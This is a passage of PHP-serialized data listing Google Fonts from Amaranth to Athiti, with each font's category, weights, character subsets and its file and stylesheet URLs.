com/s/amaranth/v6/BHyuYFj9nqLFNvOvGh0xTwJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Amaranth:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Amaranth:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Amaranth:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Amaranth:700italic";}}s:9:"amatic_sc";a:7:{s:4:"name";s:9:"Amatic SC";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/amaticsc/v8/MldbRWLFytvqxU1y81xSVg.ttf";i:700;s:86:"http://fonts.gstatic.com/s/amaticsc/v8/IDnkRTPGcrSVo50UyYNK7y3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Amatic+SC:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Amatic+SC:700";}}s:10:"amatica_sc";a:7:{s:4:"name";s:10:"Amatica SC";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";}s:5:"files";a:2:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/amaticasc/v1/f9SWSy9DLsJV2etvm5rwGPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/amaticasc/v1/nFmSxyAMfCP_5xGDJ4j5TgJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Amatica+SC:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=Amatica+SC:700";}}s:9:"amethysta";a:7:{s:4:"name";s:9:"Amethysta";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/amethysta/v4/1jEo9tOFIJDolAUpBnWbnA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Amethysta:regular";}}s:5:"amiko";a:7:{s:4:"name";s:5:"Amiko";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"600";i:2;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:3:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/amiko/v1/A7bjc3cOLJtGgpPGnxyHsw.ttf";i:600;s:62:"http://fonts.gstatic.com/s/amiko/v1/BaZst4RZ4sDyD3mH-BfVaA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/amiko/v1/6syx43mQ07VvOmpFc0G9Lg.ttf";}s:4:"urls";a:3:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Amiko:regular";i:600;s:49:"https://fonts.googleapis.com/css?family=Amiko:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Amiko:700";}}s:5:"amiri";a:7:{s:4:"name";s:5:"Amiri";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/amiri/v7/ATARrPmSew75SlpOw2YABQ.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/amiri/v7/3t1yTQlLUXBw8htrqlXBrw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/amiri/v7/WQsR_moz-FNqVwGYgptqiA.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/amiri/v7/uF8aNEyD0bxMeTBg9bFDSPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Amiri:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Amiri:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Amiri:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Amiri:700italic";}}s:5:"amita";a:7:{s:4:"name";s:5:"Amita";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/amita/v1/RhdhGBXSJqkHo6g7miTEcQ.ttf";i:700;s:62:"http://fonts.gstatic.com/s/amita/v1/cIYA2Lzp7l2pcGsqpUidBg.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Amita:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Amita:700";}}s:7:"anaheim";a:7:{s:4:"name";s:7:"Anaheim";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/anaheim/v4/t-z8aXHMpgI2gjN_rIflKA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Anaheim:regular";}}s:6:"andada";a:7:{s:4:"name";s:6:"Andada";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/andada/v7/rSFaDqNNQBRw3y19MB5Y4w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Andada:regular";}}s:6:"andika";a:7:{s:4:"name";s:6:"Andika";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/andika/v7/oe-ag1G0lcqZ3IXfeEgaGg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Andika:regular";}}s:6:"angkor";a:7:{s:4:"name";s:6:"Angkor";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/angkor/v8/DLpLgIS-8F10ecwKqCm95Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Angkor:regular";}}s:24:"annie_use_your_telescope";a:7:{s:4:"name";s:24:"Annie Use Your Telescope";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:99:"http://fonts.gstatic.com/s/annieuseyourtelescope/v6/2cuiO5VmaR09C8SLGEQjGqbp7mtG8sPlcZvOaO8HBak.ttf";}s:4:"urls";a:1:{s:7:"regular";s:72:"https://fonts.googleapis.com/css?family=Annie+Use+Your+Telescope:regular";}}s:13:"anonymous_pro";a:7:{s:4:"name";s:13:"Anonymous Pro";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/anonymouspro/v9/Zhfjj_gat3waL4JSju74E-V_5zh5b-_HiooIRUBwn1A.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/anonymouspro/v9/q0u6LFHwttnT_69euiDbWKwIsuKDCXG0NQm7BvAgx-c.ttf";i:700;s:90:"http://fonts.gstatic.com/s/anonymouspro/v9/WDf5lZYgdmmKhO8E1AQud--Cz_5MeePnXDAcLNWyBME.ttf";s:9:"700italic";s:90:"http://fonts.gstatic.com/s/anonymouspro/v9/_fVr_XGln-cetWSUc-JpfA1LL9bfs7wyIp6F8OC9RxA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Anonymous+Pro:regular";s:6:"italic";s:60:"https://fonts.googleapis.com/css?family=Anonymous+Pro:italic";i:700;s:57:"https://fonts.googleapis.com/css?family=Anonymous+Pro:700";s:9:"700italic";s:63:"https://fonts.googleapis.com/css?family=Anonymous+Pro:700italic";}}s:5:"antic";a:7:{s:4:"name";s:5:"Antic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/antic/v7/hEa8XCNM7tXGzD0Uk0AipA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Antic:regular";}}s:12:"antic_didone";a:7:{s:4:"name";s:12:"Antic Didone";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/anticdidone/v4/r3nJcTDuOluOL6LGDV1vRy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Antic+Didone:regular";}}s:10:"antic_slab";a:7:{s:4:"name";s:10:"Antic Slab";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/anticslab/v4/PSbJCTKkAS7skPdkd7AKEvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Antic+Slab:regular";}}s:5:"anton";a:7:{s:4:"name";s:5:"Anton";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/anton/v7/XIbCenm-W0IRHWYIh7CGUQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Anton:regular";}}s:6:"arapey";a:7:{s:4:"name";s:6:"Arapey";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/arapey/v5/dqu823lrSYn8T2gApTdslA.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/arapey/v5/pY-Xi5JNBpaWxy2tZhEm5A.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Arapey:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Arapey:italic";}}s:7:"arbutus";a:7:{s:4:"name";s:7:"Arbutus";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/arbutus/v5/Go_hurxoUsn5MnqNVQgodQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Arbutus:regular";}}s:12:"arbutus_slab";a:7:{s:4:"name";s:12:"Arbutus Slab";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/arbutusslab/v4/6k3Yp6iS9l4jRIpynA8qMy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Arbutus+Slab:regular";}}s:19:"architects_daughter";a:7:{s:4:"name";s:19:"Architects Daughter";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/architectsdaughter/v6/RXTgOOQ9AAtaVOHxx0IUBMCy0EhZjHzu-y0e6uLf4Fg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=Architects+Daughter:regular";}}s:13:"archivo_black";a:7:{s:4:"name";s:13:"Archivo Black";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/archivoblack/v4/WoAoVT7K3k7hHfxKbvB6B51XQG8isOYYJhPIYAyrESQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Archivo+Black:regular";}}s:14:"archivo_narrow";a:7:{s:4:"name";s:14:"Archivo Narrow";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/archivonarrow/v5/DsLzC9scoPnrGiwYYMQXppTvAuddT2xDMbdz0mdLyZY.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/archivonarrow/v5/vqsrtPCpTU3tJlKfuXP5zUpmlyBQEFfdE6dERLXdQGQ.ttf";i:700;s:91:"http://fonts.gstatic.com/s/archivonarrow/v5/M__Wu4PAmHf4YZvQM8tWsMLtdzs3iyjn_YuT226ZsLU.ttf";s:9:"700italic";s:91:"http://fonts.gstatic.com/s/archivonarrow/v5/wG6O733y5zHl4EKCOh8rSTg5KB8MNJ4uPAETq9naQO8.ttf";}s:4:"urls";a:4:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Archivo+Narrow:regular";s:6:"italic";s:61:"https://fonts.googleapis.com/css?family=Archivo+Narrow:italic";i:700;s:58:"https://fonts.googleapis.com/css?family=Archivo+Narrow:700";s:9:"700italic";s:64:"https://fonts.googleapis.com/css?family=Archivo+Narrow:700italic";}}s:10:"aref_ruqaa";a:7:{s:4:"name";s:10:"Aref Ruqaa";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/arefruqaa/v1/kbqI055uLQz2hkccTTrYPfesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:87:"http://fonts.gstatic.com/s/arefruqaa/v1/RT-Q5DVI9arM6ZKux-UmTAJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:2:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Aref+Ruqaa:regular";i:700;s:54:"https://fonts.googleapis.com/css?family=Aref+Ruqaa:700";}}s:13:"arima_madurai";a:7:{s:4:"name";s:13:"Arima Madurai";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:3:"100";i:1;s:3:"200";i:2;s:3:"300";i:3;s:7:"regular";i:4;s:3:"500";i:5;s:3:"700";i:6;s:3:"800";i:7;s:3:"900";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:8:{i:100;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/Q0tjl46beRRcUe3RlWWNrdyXLlNBCUjoM1yKFfVCFUI.ttf";i:200;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4rArwWuxcSSKq67BdR6k5Rg.ttf";i:300;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4joJ52uD-1fmXmi8u0n_zsc.ttf";s:7:"regular";s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/8fNfThKRw_pr7MwgNdcHiW_MnNA9OgK8I1F23mNWOpE.ttf";i:500;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4v_2zpxNHQ3utWt_82o9dAo.ttf";i:700;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4qiiXuG_rGcOxkuidirlnJE.ttf";i:800;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4khKLu0CevfTHM1eXjGnvQo.ttf";i:900;s:90:"http://fonts.gstatic.com/s/arimamadurai/v2/EsCGNPwBfkMk17-w_DTJ4kZ0oshA7r_PlGegwiHddT8.ttf";}s:4:"urls";a:8:{i:100;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:100";i:200;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:200";i:300;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:300";s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Arima+Madurai:regular";i:500;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:500";i:700;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:700";i:800;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:800";i:900;s:57:"https://fonts.googleapis.com/css?family=Arima+Madurai:900";}}s:5:"arimo";a:7:{s:4:"name";s:5:"Arimo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:8:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:6:"hebrew";i:7;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/arimo/v9/Gpeo80g-5ji2CcyXWnzh7g.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/arimo/v9/_OdGbnX2-qQ96C4OjhyuPw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/arimo/v9/ZItXugREyvV9LnbY_gxAmw.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/arimo/v9/__nOLWqmeXdhfr0g7GaFePesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Arimo:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Arimo:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Arimo:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Arimo:700italic";}}s:8:"arizonia";a:7:{s:4:"name";s:8:"Arizonia";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/arizonia/v6/yzJqkHZqryZBTM7RKYV9Wg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Arizonia:regular";}}s:6:"armata";a:7:{s:4:"name";s:6:"Armata";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/armata/v6/1H8FwGgIRrbYtxSfXhOHlQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Armata:regular";}}s:8:"artifika";a:7:{s:4:"name";s:8:"Artifika";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/artifika/v6/Ekfp4H4QG7D-WsABDOyj8g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Artifika:regular";}}s:4:"arvo";a:7:{s:4:"name";s:4:"Arvo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/arvo/v9/vvWPwz-PlZEwjOOIKqoZzA.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/arvo/v9/id5a4BCjbenl5Gkqonw_Rw.ttf";i:700;s:61:"http://fonts.gstatic.com/s/arvo/v9/OB3FDST7U38u3OjPK_vvRQ.ttf";s:9:"700italic";s:61:"http://fonts.gstatic.com/s/arvo/v9/Hvl2MuWoXLaCy2v6MD4Yvw.ttf";}s:4:"urls";a:4:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Arvo:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Arvo:italic";i:700;s:48:"https://fonts.googleapis.com/css?family=Arvo:700";s:9:"700italic";s:54:"https://fonts.googleapis.com/css?family=Arvo:700italic";}}s:4:"arya";a:7:{s:4:"name";s:4:"Arya";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/arya/v1/xEVqtU3v8QLospHKpDaYEw.ttf";i:700;s:61:"http://fonts.gstatic.com/s/arya/v1/N13tgOvG7VTXawiI-fJiQA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Arya:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Arya:700";}}s:4:"asap";a:7:{s:4:"name";s:4:"Asap";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/asap/v4/2lf-1MDR8tsTpEtvJmr2hA.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/asap/v4/mwxNHf8QS8gNWCAMwkJNIg.ttf";i:700;s:61:"http://fonts.gstatic.com/s/asap/v4/o5RUA7SsJ80M8oDFBnrDbg.ttf";s:9:"700italic";s:61:"http://fonts.gstatic.com/s/asap/v4/_rZz9y2oXc09jT5T6BexLQ.ttf";}s:4:"urls";a:4:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Asap:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Asap:italic";i:700;s:48:"https://fonts.googleapis.com/css?family=Asap:700";s:9:"700italic";s:54:"https://fonts.googleapis.com/css?family=Asap:700italic";}}s:4:"asar";a:7:{s:4:"name";s:4:"Asar";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/asar/v2/mSmn3H5CcMA84CZ586X7WQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Asar:regular";}}s:5:"asset";a:7:{s:4:"name";s:5:"Asset";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/asset/v6/hfPmqY-JzuR1lULlQf9iTg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Asset:regular";}}s:9:"assistant";a:7:{s:4:"name";s:9:"Assistant";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"800";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"hebrew";}s:5:"files";a:6:{i:200;s:87:"http://fonts.gstatic.com/s/assistant/v1/xXstfiHQzjB9j5ZxYTBoZy3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:87:"http://fonts.gstatic.com/s/assistant/v1/vPC3tCw3LOzCSeGCtVp5Wi3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/assistant/v1/2iDwv6DBtyixlK5YHngp1w.ttf";i:600;s:87:"http://fonts.gstatic.com/s/assistant/v1/Y4UC5nQA69lWpfV0itoWLi3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:87:"http://fonts.gstatic.com/s/assistant/v1/dZywGH4pMxP6OVyrppOJxy3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:87:"http://fonts.gstatic.com/s/assistant/v1/-mTR0sX8a0RsadH4AMDT8C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:6:{i:200;s:53:"https://fonts.googleapis.com/css?family=Assistant:200";i:300;s:53:"https://fonts.googleapis.com/css?family=Assistant:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Assistant:regular";i:600;s:53:"https://fonts.googleapis.com/css?family=Assistant:600";i:700;s:53:"https://fonts.googleapis.com/css?family=Assistant:700";i:800;s:53:"https://fonts.googleapis.com/css?family=Assistant:800";}}s:7:"astloch";a:7:{s:4:"name";s:7:"Astloch";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/astloch/v6/fmbitVmHYLQP7MGPuFgpag.ttf";i:700;s:85:"http://fonts.gstatic.com/s/astloch/v6/aPkhM2tL-tz1jX6aX2rvo_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Astloch:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Astloch:700";}}s:4:"asul";a:7:{s:4:"name";s:4:"Asul";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/asul/v5/9qpsNR_OOwyOYyo2N0IbBw.ttf";i:700;s:61:"http://fonts.gstatic.com/s/asul/v5/uO8uNmxaq87-DdPmkEg5Gg.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Asul:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Asul:700";}}s:6:"athiti";a:7:{s:4:"name";s:6:"Athiti";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i: